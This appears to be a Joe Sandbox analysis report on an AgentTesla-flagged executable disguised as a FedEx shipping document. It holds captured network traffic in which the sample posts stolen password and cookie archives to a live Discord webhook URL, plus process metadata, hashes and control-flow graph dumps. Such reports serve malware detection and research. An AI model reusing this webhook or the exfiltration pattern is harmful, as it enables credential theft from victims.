                                                                                      Content-Type: application/json
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      set-cookie: __dcfduid=40c5656cc70d11edb0c39210813c6258; Expires=Sat, 18-Mar-2028 10:52:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                      x-ratelimit-limit: 5
                                                                                      x-ratelimit-remaining: 4
                                                                                      x-ratelimit-reset: 1679309526
                                                                                      x-ratelimit-reset-after: 1
                                                                                      Via: 1.1 google
                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y0BSRKb27zSropPzt%2Bg6Z2X4UEhJRQk8Bj2YvlMJS8AfkifTFWNGMfjw4oHWaNjxINrmBp46whbhVKRsouDeaP5B5q%2Bum2dhRkhGSHkQ4J43Rffu%2FD9s5Y5Zfpiy"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Set-Cookie: __sdcfduid=40c5656cc70d11edb0c39210813c62587ea41797631d80b0eb81fb5fb59f040505ee2c8191420557b081c2ad7edc3c28; Expires=Sat, 18-Mar-2028 10:52:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                      Set-Cookie: __cfruid=5019ff0ae1936eba3cb560abc34fa003b3655eb0-1679309525; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 7aad6753997f085b-FRA
                                                                                      442
                                                                                      {"id": "10873276996
2023-03-20 10:52:05 UTC | 3 | IN | Data Raw: (hex dump omitted; the decoded form follows)
                                                                                      Data Ascii: 53111810", "type": 0, "content": "New PW Recovered!\n\nTime: 03/20/2023 20:11:13\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address:", "channel_id": "108596098407152
2023-03-20 10:52:05 UTC | 4 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49702 | 162.159.135.232 | 443 | C:\Users\user\Desktop\FeDex_shipping_document.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-20 10:52:06 UTC | 4 | OUT | POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----------8b7e5ceedd2047309d0db2508590a0cd
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                      Host: discord.com
                                                                                      Content-Length: 2002
                                                                                      Expect: 100-continue
2023-03-20 10:52:06 UTC | 4 | IN | HTTP/1.1 100 Continue
2023-03-20 10:52:06 UTC | 4 | OUT | Data Raw: (hex dump omitted; the decoded form follows)
                                                                                      Data Ascii: ------------8b7e5ceedd2047309d0db2508590a0cdContent-Disposition: form-data; name="filename"user-128757 2023-03-20 22-30-44.zip------------8b7e5ceedd2047309d0db2508590a0cdContent-Disposition: form-data; name="fileformat"zip------------
2023-03-20 10:52:06 UTC | 6 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 20 Mar 2023 10:52:06 GMT
                                                                                      Content-Type: application/json
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      set-cookie: __dcfduid=416011b6c70d11edb536760b3bcdf2c3; Expires=Sat, 18-Mar-2028 10:52:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                      x-ratelimit-limit: 5
                                                                                      x-ratelimit-remaining: 4
                                                                                      x-ratelimit-reset: 1679309527
                                                                                      x-ratelimit-reset-after: 1
                                                                                      Via: 1.1 google
                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OULjCI%2F1N55yjSCOGXM8Y%2FxHMpSBWVpW8%2FwwbhhWxOTTi%2BUEvHDCdTOwV9ULOH1gbtIw4dw4oEWRDWgOzn3tNgUpj9gep8yovhl2UnE1M5w0U%2B0M%2B5R0qRItF%2F3e"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Set-Cookie: __sdcfduid=416011b6c70d11edb536760b3bcdf2c31926f826f620e903433f2215b6d2f998ca16186ab205ab9b49458d3f841b5914; Expires=Sat, 18-Mar-2028 10:52:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                      Set-Cookie: __cfruid=5ba988da0ff0fc085ce4e493a530e21de7d0e050-1679309526; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 7aad675a2dba360b-FRA
                                                                                      437
                                                                                      {"id": "108
2023-03-20 10:52:06 UTC | 7 | IN | Data Raw: (hex dump omitted; the decoded form follows)
                                                                                      Data Ascii: 7327704170369065", "type": 0, "content": "New CO Recovered!\n\nTime: 03/20/2023 22:30:44\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address:", "channel_id": "1085960
2023-03-20 10:52:06 UTC | 8 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0



Target ID: 0
Start time: 11:51:39
Start date: 20/03/2023
Path: C:\Users\user\Desktop\FeDex_shipping_document.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\FeDex_shipping_document.exe
Imagebase: 0xe70000
File size: 746496 bytes
MD5 hash: 5CF87A160007A5E6C7A4D24E1D831327
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

Target ID: 1
Start time: 11:51:46
Start date: 20/03/2023
Path: C:\Users\user\Desktop\FeDex_shipping_document.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\FeDex_shipping_document.exe
Imagebase: 0xac0000
File size: 746496 bytes
MD5 hash: 5CF87A160007A5E6C7A4D24E1D831327
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low


                                                                                        Execution Graph

                                                                                        Execution Coverage:9.3%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:108
                                                                                        Total number of Limit Nodes:7
execution_graph (rendered graph omitted; the Windows APIs reached from its nodes are GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, DuplicateHandle, CreateActCtxA, GetModuleHandleW and LoadLibraryExW)

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0184C370
                                                                                        • GetCurrentThread.KERNEL32 ref: 0184C3AD
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0184C3EA
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0184C443
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: e9816d0853fd53e9ea1f5e473d438276abe010f98fa0cbb61aca5c320ee58997
                                                                                        • Instruction ID: b0cd9baea88461da73f7f74c7f468d3459dabacaf970c257e27274b489f41409
                                                                                        • Opcode Fuzzy Hash: e9816d0853fd53e9ea1f5e473d438276abe010f98fa0cbb61aca5c320ee58997
                                                                                        • Instruction Fuzzy Hash: 4E5174B09012498FDB14CFAADA48B9EBFF4BF49310F24855AE109B7251DB349A84CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0184C370
                                                                                        • GetCurrentThread.KERNEL32 ref: 0184C3AD
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0184C3EA
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0184C443
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: e34f7aac34254d8a43fc6eca3b203c608ed40ea9a2f57c2d3eb40f77530b8c26
                                                                                        • Instruction ID: a38bf65dc0f1a42b27889963dd827a34e9c3f9a687c25af8a577cc4056f5da4e
                                                                                        • Opcode Fuzzy Hash: e34f7aac34254d8a43fc6eca3b203c608ed40ea9a2f57c2d3eb40f77530b8c26
                                                                                        • Instruction Fuzzy Hash: 545154B09012098FDB14CFAADA48BDEBBF4BF49314F20855AE109B7350DB349A84CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 39 184a028-184a030 40 184a03b-184a03d 39->40 41 184a036 call 1849370 39->41 42 184a053-184a057 40->42 43 184a03f 40->43 41->40 44 184a059-184a063 42->44 45 184a06b-184a0ac 42->45 95 184a045 call 184a2a0 43->95 96 184a045 call 184a2b0 43->96 44->45 50 184a0ae-184a0b6 45->50 51 184a0b9-184a0c7 45->51 46 184a04b-184a04d 46->42 48 184a188-184a248 46->48 88 184a250-184a27b GetModuleHandleW 48->88 89 184a24a-184a24d 48->89 50->51 52 184a0c9-184a0ce 51->52 53 184a0eb-184a0ed 51->53 56 184a0d0-184a0d7 call 184937c 52->56 57 184a0d9 52->57 55 184a0f0-184a0f7 53->55 60 184a104-184a10b 55->60 61 184a0f9-184a101 55->61 58 184a0db-184a0e9 56->58 57->58 58->55 64 184a10d-184a115 60->64 65 184a118-184a121 call 184938c 60->65 61->60 64->65 70 184a123-184a12b 65->70 71 184a12e-184a133 65->71 70->71 72 184a135-184a13c 71->72 73 184a151-184a155 71->73 72->73 75 184a13e-184a14e call 184939c call 18493ac 72->75 93 184a158 call 184a580 73->93 94 184a158 call 184a5a8 73->94 75->73 77 184a15b-184a15e 80 184a160-184a17e 77->80 81 184a181-184a187 77->81 80->81 90 184a284-184a298 88->90 91 184a27d-184a283 88->91 89->88 91->90 93->77 94->77 95->46 96->46
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0184A26E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: df14494e2cb82d16df9d7830d82e91b4da099002ebd0d2a81caedb97c88767b8
                                                                                        • Instruction ID: 46a479b035178dca1ce1ef57f9d1ad799e9eca089415f6503235e252edc2790d
                                                                                        • Opcode Fuzzy Hash: df14494e2cb82d16df9d7830d82e91b4da099002ebd0d2a81caedb97c88767b8
                                                                                        • Instruction Fuzzy Hash: 64713470A00B098FDB68DF6AD45075ABBF1BF88304F008A2ED44ADBA50DB35E945CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 97 1845364-184536e 98 1845370-1845431 CreateActCtxA 97->98 100 1845433-1845439 98->100 101 184543a-1845494 98->101 100->101 108 1845496-1845499 101->108 109 18454a3-18454a7 101->109 108->109 110 18454b8 109->110 111 18454a9-18454b5 109->111 113 18454b9 110->113 111->110 113->113
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01845421
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 37276ba6ab409296be4cff5dfb137a83c180f6059b6eabe4c621d90a6a2d22c4
                                                                                        • Instruction ID: 8c0935aa872af675e3362b91a22d17aadd93bef391dd367d353a1b9a9ea9cb04
                                                                                        • Opcode Fuzzy Hash: 37276ba6ab409296be4cff5dfb137a83c180f6059b6eabe4c621d90a6a2d22c4
                                                                                        • Instruction Fuzzy Hash: AE41F4B1D0061DCFDB24CFA9C984BCDBBB5BF59314F20806AD418AB251DB756946CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 114 1843de8-1845431 CreateActCtxA 117 1845433-1845439 114->117 118 184543a-1845494 114->118 117->118 125 1845496-1845499 118->125 126 18454a3-18454a7 118->126 125->126 127 18454b8 126->127 128 18454a9-18454b5 126->128 130 18454b9 127->130 128->127 130->130
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01845421
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 5c659df5374430fa8e133f1c9c8c031496a44828ad57773dc5b47c53ab4e001d
                                                                                        • Instruction ID: 4ed7b6bb58d1caf8f0cfdd2a44ed3d2c7242d190913db06ff9c61f520d7a8ace
                                                                                        • Opcode Fuzzy Hash: 5c659df5374430fa8e133f1c9c8c031496a44828ad57773dc5b47c53ab4e001d
                                                                                        • Instruction Fuzzy Hash: B941C1B1D0061DCFDB24CFAAC9847CEBBB5BF58315F60805AD408AB251DBB55945CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 131 184c938-184c93e 132 184c945-184c9d4 DuplicateHandle 131->132 133 184c940-184c944 131->133 134 184c9d6-184c9dc 132->134 135 184c9dd-184c9fa 132->135 133->132 134->135
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0184C9C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 92750d92a17f8139e8f49314c20273094ae1b8d4d79d248b92187348b13f05c6
                                                                                        • Instruction ID: 02b8a4758ee3ab7c0783233f889fcab806cc056bed1cdc135fe200a1fda09f21
                                                                                        • Opcode Fuzzy Hash: 92750d92a17f8139e8f49314c20273094ae1b8d4d79d248b92187348b13f05c6
                                                                                        • Instruction Fuzzy Hash: 4B21E7B5D01218AFDB10CF9AD584ADEBFF8FB48320F14841AE914B3610D374A954CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 138 184c940-184c9d4 DuplicateHandle 140 184c9d6-184c9dc 138->140 141 184c9dd-184c9fa 138->141 140->141
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0184C9C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: c5b4cdecc7c599f89e03cd0d2eef2bf7a39cd0366eaab013763cd44d1360d2ee
                                                                                        • Instruction ID: bf1687bc3fa46f8bc90509ba2cfc408d32603878e179dda22b39b0a659e394d4
                                                                                        • Opcode Fuzzy Hash: c5b4cdecc7c599f89e03cd0d2eef2bf7a39cd0366eaab013763cd44d1360d2ee
                                                                                        • Instruction Fuzzy Hash: 1821C4B5D01219AFDB10CF9AD984ADEBFF8EB58320F14841AE914B3310D378A954CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 144 184a488-184a48e 145 184a495-184a4d0 144->145 146 184a490-184a494 144->146 147 184a4d2-184a4d5 145->147 148 184a4d8-184a507 LoadLibraryExW 145->148 146->145 147->148 149 184a510-184a52d 148->149 150 184a509-184a50f 148->150 150->149
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0184A2E9,00000800,00000000,00000000), ref: 0184A4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 239cb9624a1b211837de6d637a249c12dcdf8afb159808914f2dca129d241a61
                                                                                        • Instruction ID: efc304620b3b89e57b0245ea117b64836ff5ec7ead3174a3173e5b201326a4c4
                                                                                        • Opcode Fuzzy Hash: 239cb9624a1b211837de6d637a249c12dcdf8afb159808914f2dca129d241a61
                                                                                        • Instruction Fuzzy Hash: 1E2147B6D002088FDB14CFAAC484ADEFBF8EB48320F14841AD519BB200C779A645CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 153 18493d8-184a4d0 156 184a4d2-184a4d5 153->156 157 184a4d8-184a507 LoadLibraryExW 153->157 156->157 158 184a510-184a52d 157->158 159 184a509-184a50f 157->159 159->158
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0184A2E9,00000800,00000000,00000000), ref: 0184A4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: f9d1426ac4a9352c1241475e66ffbe19d19d19ef3e9ff08971eba718db240ecc
                                                                                        • Instruction ID: 18ded4f1c320fe32860821338e135bdc3436ece11b992ba11b5299cc981bdc04
                                                                                        • Opcode Fuzzy Hash: f9d1426ac4a9352c1241475e66ffbe19d19d19ef3e9ff08971eba718db240ecc
                                                                                        • Instruction Fuzzy Hash: ED1147B2D002088FDB14CF9AC444ADEFBF4EB48310F10841AE519B7200C774AA45CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 162 184a208-184a248 163 184a250-184a27b GetModuleHandleW 162->163 164 184a24a-184a24d 162->164 165 184a284-184a298 163->165 166 184a27d-184a283 163->166 164->163 166->165
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0184A26E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265893382.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1840000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: ae9cc5627b2c731597fb6347ec89b23c8e9894d2b93ef70cd920bc0deb953d23
                                                                                        • Instruction ID: a3ba068620d3de4305f4cf48b64bf27826ecb88171cd3bce6df319db07d01996
                                                                                        • Opcode Fuzzy Hash: ae9cc5627b2c731597fb6347ec89b23c8e9894d2b93ef70cd920bc0deb953d23
                                                                                        • Instruction Fuzzy Hash: 291113B5D006198FDB14CF9AD444ADEFBF4EF88324F14851AD519B7600C379A645CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265445635.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15dd000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5515bcd51bdafcf616bb9ebdbb71b2e51eeac3eecd1d94d7060ca653cd9861f3
                                                                                        • Instruction ID: ce07902c82df3fc24b9012506e7b243f5e86bd89c46f3a3a3ba5b6176b4a801f
                                                                                        • Opcode Fuzzy Hash: 5515bcd51bdafcf616bb9ebdbb71b2e51eeac3eecd1d94d7060ca653cd9861f3
                                                                                        • Instruction Fuzzy Hash: E321F471500240DFDB21DF58D9C0B5ABFB5FB84324F24C569D8090F286C37AE856CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265609795.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15ed000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2cbb20ba1c0b358a4b58269b9fa7326ce97b28cf202c38968520ced85650ba92
                                                                                        • Instruction ID: 1e37944103bca61116bb5df581dade5515615b1cfbb577b8fdaf45289e85ff67
                                                                                        • Opcode Fuzzy Hash: 2cbb20ba1c0b358a4b58269b9fa7326ce97b28cf202c38968520ced85650ba92
                                                                                        • Instruction Fuzzy Hash: 30212271A04240DFDB19CF58D8C8B26BFF5FB84354F28C969D80A0F246D33AD806CAA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265609795.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15ed000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5e9c6aeffe843385ef733b32ffbde6b7dbcaae7ba8cd2781544ef2cb51fe6a7a
                                                                                        • Instruction ID: 2df75b02e2edd4f99b60568364bcbd87cc03b68168ef36aa2c3c5aa629593062
                                                                                        • Opcode Fuzzy Hash: 5e9c6aeffe843385ef733b32ffbde6b7dbcaae7ba8cd2781544ef2cb51fe6a7a
                                                                                        • Instruction Fuzzy Hash: BA21F575904240DFDB09DF58D9C4B1ABBF5FB84324F24CAADD8494F242C33AD846CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265609795.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15ed000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26235df71612fae75ed6659bb55cdc83fd43c266b1b705fd9cf0a3ddf06a5a8d
                                                                                        • Instruction ID: a7f8f13a8abb66eb67a83e9e628e88fa798f334c804f5636f75cd165399404e6
                                                                                        • Opcode Fuzzy Hash: 26235df71612fae75ed6659bb55cdc83fd43c266b1b705fd9cf0a3ddf06a5a8d
                                                                                        • Instruction Fuzzy Hash: 0D2192755093808FDB17CF24D994B15BFB1FB46214F28C5EAD8498F657C33A980ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265445635.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15dd000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 61320e68dcada6a4288cfb14426133e2d8667ae2203a6cd0fd4dceb7ffcfce69
                                                                                        • Instruction ID: 8e3fdf3ba10df7dcf9e1e60d0fc2eb4b0bc1fa9077c354e229a3fb1642dea574
                                                                                        • Opcode Fuzzy Hash: 61320e68dcada6a4288cfb14426133e2d8667ae2203a6cd0fd4dceb7ffcfce69
                                                                                        • Instruction Fuzzy Hash: C711DF72404280DFDB22CF48D9C0B5ABF71FB84324F24C2A9D8090F656C33AE456CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265609795.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15ed000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d8b01aa10aa151543403a38a450c85d57a6413dd1d1fd3e55dbf65ef40ab6d48
                                                                                        • Instruction ID: 9558cb781469c69e5b70708aef94fc7feac5980aad76ae2a232561fc970caf46
                                                                                        • Opcode Fuzzy Hash: d8b01aa10aa151543403a38a450c85d57a6413dd1d1fd3e55dbf65ef40ab6d48
                                                                                        • Instruction Fuzzy Hash: 6011BB76904280DFDB16CF54CAC4B19BBB1FB84224F28C6ADD8494F656C33AD44ACB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265445635.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15dd000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a299c17c5d4473c538842bac3af7a165c056125aea5c3c564245685b100c745c
                                                                                        • Instruction ID: 192b744c10362048c8d01d6747910d8ac1ce677f0156aaf8c45530d2ecdcae9e
                                                                                        • Opcode Fuzzy Hash: a299c17c5d4473c538842bac3af7a165c056125aea5c3c564245685b100c745c
                                                                                        • Instruction Fuzzy Hash: 6301D4615042C0AAE7308A5DCC84B6ABFECEF51224F09859AED091E286C2799840C7B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.265445635.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15dd000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6e5cc6ab55b7d4b6a754517b9621f7867c3bd4aae6a4ec478ea7485ee8414e2d
                                                                                        • Instruction ID: 63d486531ca7061ef96f5f8b52c4dcf28c0a35d53eb815feda38203a6475e665
